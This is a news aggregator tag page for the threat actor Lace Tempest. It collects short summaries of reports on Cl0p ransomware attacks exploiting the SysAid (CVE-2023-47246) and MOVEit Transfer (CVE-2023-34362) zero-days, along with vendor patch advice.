tldrdaily.news logo
Tag

Lace Tempest

All articles tagged with #lace tempest

cybersecurity2 years ago

SysAid Zero-Day Exploits: A Growing Threat in Ransomware Attacks

The threat actor Lace Tempest has been exploiting a zero-day vulnerability in the SysAid IT support software to distribute the Cl0p ransomware. The vulnerability, tracked as CVE-2023-47246, allows for code execution within on-premise installations and has been patched by SysAid. After exploiting the flaw, Lace Tempest deploys a malware loader for the Gracewire malware, followed by human-operated activities such as lateral movement, data theft, and ransomware deployment. The attack involves uploading a web shell and other payloads into the SysAid Tomcat web service, as well as the use of the MeshCentral Agent and PowerShell to download and run Cobalt Strike. Organizations using SysAid are advised to apply the patches promptly and scan for signs of exploitation. The FBI has also warned about ransomware attackers targeting third-party vendors and legitimate system tools to compromise businesses.

via The Hacker News|
#cybersecurity#lace-tempest#microsoft
cybersecurity2 years ago

Hacker Group Exploits Zero-Day Bug to Target ITSM Platform

A critical zero-day vulnerability (CVE-2023-47246) in the SysAid IT support and management software solution is being exploited by the ransomware affiliate Lace Tempest, known for deploying Cl0p ransomware. This is not the first time Lace Tempest has exploited zero-day vulnerabilities, having previously targeted Progress Software's MOVEit Transfer installations, Accellion file transfer appliance, and Fortra's GoAnywhere file transfer solution. The vulnerability allows unauthorized access to affected systems and execution of arbitrary code. SysAid has released a patch (v23.3.36) and advised customers to update their systems and check for evidence of compromise.

via Help Net Security|
#cybersecurity#data-breach#lace-tempest
cybersecurity2 years ago

SysAid Zero-Day Flaw Exploited in Ransomware Attacks: Microsoft and SysAid Issue Urgent Patch Warning

Threat actors are exploiting a zero-day vulnerability in the service management software SysAid to gain access to corporate servers for data theft and to deploy Clop ransomware. The vulnerability, identified as CVE-2023-47246, was discovered by Microsoft and used by a threat actor known as Lace Tempest. SysAid has released a patch for the vulnerability and provided indicators of compromise to help detect or prevent the intrusion. SysAid users are strongly recommended to update to version 23.3.36 or later and conduct thorough server checks for signs of compromise.

via BleepingComputer|
#clop-ransomware#cybersecurity#lace-tempest
cybersecurity2 years ago

MOVEit Exploit Used by Ransomware Gang for Data Theft, Microsoft and CISA Warn

Microsoft has linked the Clop ransomware gang to recent data theft attacks that exploited a zero-day vulnerability in the MOVEit Transfer platform. The attacks began on May 27th, with the threat actors dropping webshells on servers to steal data and credentials. Microsoft is attributing the attacks to Lace Tempest, also known as TA505, FIN11, or DEV-0950. The Clop ransomware operation is known for targeting managed file transfer software and is expected to begin extorting victims soon.

via BleepingComputer|
#clop-ransomware#cybersecurity#data-theft
cybersecurity2 years ago

MOVEit Transfer App Exploited by Hackers for Data Theft and Ransomware Attacks, Microsoft and CISA Warn

Microsoft has linked the ongoing exploitation of a critical flaw in the Progress Software MOVEit Transfer application to the Lace Tempest threat actor. The group is known for exploiting different zero-day flaws to siphon data and extort victims. The flaw, CVE-2023-34362, allows attackers to authenticate as any user and gain access to the database and execute arbitrary code. At least 3,000 exposed hosts are believed to be utilizing the MOVEit Transfer service. Users are recommended to apply vendor-provided patches as soon as possible to secure against potential risks.

via The Hacker News|
#cybersecurity#data-exfiltration#lace-tempest